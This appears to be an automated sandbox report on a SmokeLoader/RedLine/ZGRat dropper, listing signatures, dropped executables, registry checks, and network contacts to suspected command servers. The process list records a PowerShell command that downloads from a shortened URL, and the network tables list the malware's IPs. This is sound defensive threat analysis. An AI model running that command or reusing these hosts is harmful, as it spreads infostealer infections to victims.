Analysis Overview
SHA256
2b3edccf5deb78e43bf9267a60f85b096b25f15cf6bd1c83c56404d7fe0e7dda
Threat Level: Known bad
The file 0x00310000000142c9-42.dat was found to be: Known bad.
Malicious Activity Summary
ZGRat
RedLine
RedLine payload
Detect ZGRat V1
Smokeloader family
SmokeLoader
Downloads MZ/PE file
Executes dropped EXE
Deletes itself
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Unsigned PE
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Checks SCSI registry key(s)
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-12-18 22:22
Signatures
Smokeloader family
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2023-12-18 22:22
Reported
2023-12-18 22:24
Platform
win7-20231215-en
Max time kernel
28s
Max time network
89s
Command Line
Signatures
RedLine
RedLine payload
SmokeLoader
Downloads MZ/PE file
Deletes itself
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\6D44.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8161.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1200 wrote to memory of 2676 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\6D44.exe |
| PID 1200 wrote to memory of 2676 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\6D44.exe |
| PID 1200 wrote to memory of 2676 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\6D44.exe |
| PID 1200 wrote to memory of 2676 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\6D44.exe |
| PID 1200 wrote to memory of 2828 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8161.exe |
| PID 1200 wrote to memory of 2828 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8161.exe |
| PID 1200 wrote to memory of 2828 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8161.exe |
| PID 1200 wrote to memory of 2828 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8161.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe
"C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe"
C:\Users\Admin\AppData\Local\Temp\6D44.exe
C:\Users\Admin\AppData\Local\Temp\6D44.exe
C:\Users\Admin\AppData\Local\Temp\8161.exe
C:\Users\Admin\AppData\Local\Temp\8161.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| RU | 5.42.65.125:80 | 5.42.65.125 | tcp |
| RU | 77.105.132.87:17066 | | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 64.185.227.156:80 | api.ipify.org | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-18 22:22
Reported
2023-12-18 22:24
Platform
win10v2004-20231215-en
Max time kernel
32s
Max time network
66s
Command Line
Signatures
Detect ZGRat V1
RedLine
RedLine payload
SmokeLoader
ZGRat
Downloads MZ/PE file
Deletes itself
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A539.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3492 wrote to memory of 700 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A539.exe |
| PID 3492 wrote to memory of 700 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A539.exe |
| PID 3492 wrote to memory of 700 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A539.exe |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe
"C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe"
C:\Users\Admin\AppData\Local\Temp\A539.exe
C:\Users\Admin\AppData\Local\Temp\A539.exe
C:\Users\Admin\AppData\Local\Temp\B15F.exe
C:\Users\Admin\AppData\Local\Temp\B15F.exe
C:\Users\Admin\AppData\Local\Temp\BDA5.exe
C:\Users\Admin\AppData\Local\Temp\BDA5.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c install.bat
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/3RmFzgo'"
C:\Users\Admin\AppData\Local\Temp\is-6NLTA.tmp\tuc3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6NLTA.tmp\tuc3.tmp" /SL5="$501FC,7276951,68608,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Users\Admin\AppData\Local\Temp\C288.exe
C:\Users\Admin\AppData\Local\Temp\C288.exe
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Query
C:\Program Files (x86)\StdButton\stdbutton.exe
"C:\Program Files (x86)\StdButton\stdbutton.exe" -s
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.53.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| US | 8.8.8.8:53 | 68.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 52.217.73.60:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 1.141.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.73.217.52.in-addr.arpa | udp |
| RU | 77.105.132.87:17066 | | tcp |
| US | 8.8.8.8:53 | 87.132.105.77.in-addr.arpa | udp |
| RU | 5.42.65.125:80 | | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 4.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 64.185.227.156:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 156.227.185.64.in-addr.arpa | udp |
| BG | 91.92.254.7:80 | 91.92.254.7 | tcp |
| US | 93.184.216.34:443 | | tcp |
| US | 52.165.165.26:443 | | tcp |
| RU | 5.42.64.35:80 | | tcp |
Files